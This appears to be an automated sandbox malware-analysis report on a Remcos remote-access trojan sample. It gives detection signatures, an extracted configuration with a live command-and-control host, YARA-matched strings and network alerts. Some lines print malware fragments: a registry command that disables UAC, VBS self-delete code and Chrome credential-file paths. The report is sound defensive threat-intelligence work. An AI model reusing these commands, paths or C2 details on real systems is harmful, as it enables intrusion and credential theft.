Windows Analysis Report
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe

Overview

General Information

Sample name: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Analysis ID: 1586001
MD5: fa48843ce9a50a4bc84f6996923b7a27
SHA1: 29df9451a5aae33ddca11c26163d1c276bf2ca65
SHA256: 311df69d6714a0736be9908da11fa4c544a542ba4f9c99a314e727b321a80cd7
Tags: base64-decoded, exe, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Deletes itself after installation
Installs a global keyboard hook
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Extracted malware configuration (Remcos): {"Host:Port:Password": ["luiscaseres.gleeze.com:1997:1"], "Assigned name": "19-12-24", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IUHLZ9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | REMCOS_RAT_variants | unknown | unknown
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
(1 further entry not expanded in this export)

Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x146f8:$a1: Remcos restarted by watchdog!
  • 0x14c70:$a3: %02i:%02i:%02i:%03i
00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(9 further entries not expanded in this export)

Source | Rule | Description | Author | Strings
0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
(7 further entries not expanded in this export)

                        System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ParentProcessId: 7784, ParentProcessName: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs" , ProcessId: 4444, ProcessName: wscript.exe

                        Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, ProcessId: 7784, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata alerts:
Timestamp: 2025-01-08T16:00:33.207020+0100 | SID: 2036594 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.8 | Source Port: 49705 | Destination IP: 179.15.136.6 | Destination Port: 1997 | Protocol: TCP
Timestamp: 2025-01-08T16:00:35.337900+0100 | SID: 2803304 | Severity: 3 | Classtype: Unknown Traffic | Source IP: 192.168.2.8 | Source Port: 49706 | Destination IP: 178.237.33.50 | Destination Port: 80 | Protocol: TCP


                        AV Detection

Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Avira: detected
Source: luiscaseres.gleeze.com | Avira URL Cloud: Label: malware
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["luiscaseres.gleeze.com:1997:1"], "Assigned name": "19-12-24", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-IUHLZ9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_0043294A
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_f4b8614d-f

                        Exploits

Source: Yara match | File source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR

                        Privilege Escalation

Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00406764 _wcslen,CoGetObject,0_2_00406764
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B43F
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_0044D5F9 FindFirstFileExA,0_2_0044D5F9
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C79
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06

                        Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49705 -> 179.15.136.6:1997
Source: Malware configuration extractor | URLs: luiscaseres.gleeze.com
Source: global traffic | TCP traffic: 192.168.2.8:49705 -> 179.15.136.6:1997
Source: global traffic | HTTP traffic detected:
  GET /json.gp HTTP/1.1
  Host: geoplugin.net
  Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View | ASN Name: ColombiaMovilCO ColombiaMovilCO
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49706 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00426107 recv,0_2_00426107
Source: global traffic | HTTP traffic detected:
  GET /json.gp HTTP/1.1
  Host: geoplugin.net
  Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: luiscaseres.gleeze.com
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.0000000000801000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.0000000000801000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpj

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000 0_2_004099E4
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe | Code function: 0_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_00409B10
Source: Yara match | File source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR

                        E-Banking Fraud

Source: Yara match | File source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

